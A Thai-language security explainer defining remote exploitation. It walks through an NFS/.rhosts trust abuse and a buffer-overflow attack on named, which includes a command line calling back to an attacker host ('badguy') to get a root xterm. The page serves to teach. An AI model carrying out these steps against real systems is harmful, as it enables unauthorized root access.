Remote Exploit

อะไรคือการเจาะระบบแบบ remote ? (16/12/44)

การเจาะระบบแบบ remote เกิดขึ้นเมื่อคุณโจมตีเซิร์ฟเวอร์ที่คุณไม่ได้ล๊อกอินเข้าไป โดยโจมตีจากเซิร์ฟเวอร์อื่น ถึงแม้ว่าในบางกรณีคุณสามารถโจมตีจากเครื่องพีซีทั่ว ๆ ไป (ขึ้นอยู่กับระบบปฏิบัติการ)

การเดาแอกเคาท์ของยูสเซอร์และรหัสผ่าน (ยกเว้นแต่ว่ามีแอกเคาท์ guest) ในระบบอื่นไม่ถือว่าเป็นการเจาะแบบ remote เราจะสมมุติว่า คุณไม่รู้ชื่อแอกเคาท์และรหัสผ่านในระบบอื่น

การ เจาะระบบแบบ remote แบ่งเป็นสองประเภท โดยมักจะเป็นการเจาะโดยอาศัยช่องโหว่ที่มีในเซอร์วิสที่กำลังรันอยู่ใน เซิร์ฟเวอร์ที่ตกเป็นเหยื่อ (ที่มีการกำหนดค่าระบบไม่ถูกต้องหรือยอมให้มีการเข้าถึงมากเกินไป การ export NFS (network file system) mount แบบ read/write ให้ทุกคนสามารถเข้าถึงได้อาจไม่ใช่สิ่งที่ไม่เลวร้าย แต่ถ้าคุณสามารถ NFS mount ไดเร็กทอรีที่มีไฟล์ .rhosts ได้เป็นสิ่งที่เลวร้ายมาก นอกจากนี้ daemon ที่รันอยู่บางชนิดอาจมีปัญหาที่อาจถูกโจมตีแบบ buffer overflow แบบ remote ได้ ยอมให้ใครบางคนจากเซิร์ฟเวอร์อื่นสามารถใช้คำสั่งในเครื่องที่ตกเป็นเป้า หมายได้ตามต้องการ

ต่อไปนี้เป็นตัวอย่างสองตัวอย่างด้วยกัน

- คุณเป็น root ในเครื่องที่ชื่อว่า badguy
- คุณค้นพบว่าโฮสต์เป้าหมาย export /home2/old เป็นแบบ read/write ให้ทุกคนสามารถเข้าถึงได้
- คุณใช้คำสั่ง finger ไปยังแอกเคาท์ต่าง ๆ แล้วพบว่า home directory ของยูสเซฮร์ fred คือ /home2/old/fred เขาไม่ได้ log in หลายเดือนแล้ว
- คุณสร้างแอกเคาท์ fred ในเครื่อง badguy ทันที
- แล้วคุณจึง mount /home2/old ในเครื่องเป้าหมาย แล้วสร้างไฟล์ .rhosts เพื่อให้เครื่องที่ตกเป็นเหยื่อเชื่อถือเครื่อง badguy
- หลังจากที่คุณเป็นยูสเซอร์ fred ในเครื่อง badguy คุณจึงเชื่อมต่อแบบ rlogin ไปยังเครื่องเป้าหมายโดยเป็นยูสเซอร์ fred

ต่อไปนี้เป็นตัวอย่างการโจมตีโดยอาศัย buffer overflow

- โฮสต์ที่เป็นเป้าหมายกำลังรัน named
- คุณได้เขียน exploit ที่เกี่ยวกับ named ที่ยอมให้คุณสามารถส่งคำสั่งได้ตามต้องการผ่าน named daemon ซึ่งใช้เทคนิค buffer overflow คุณคอมไพล์มันและตั้งชื่อว่า sploit
- คุณพิมพ์ว่า: sploit victim.nmrc.org "/usr/X11R6/bin/xterm -display badguy.whatever:0"
- มีวินโดวส์ปรากฏขึ้นที่จอเทอร์มินัลของคุณที่กำลังรันเป็น root อยู่ที่ victim.nmrc.org

ข้อมูล infosec.sran.org

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License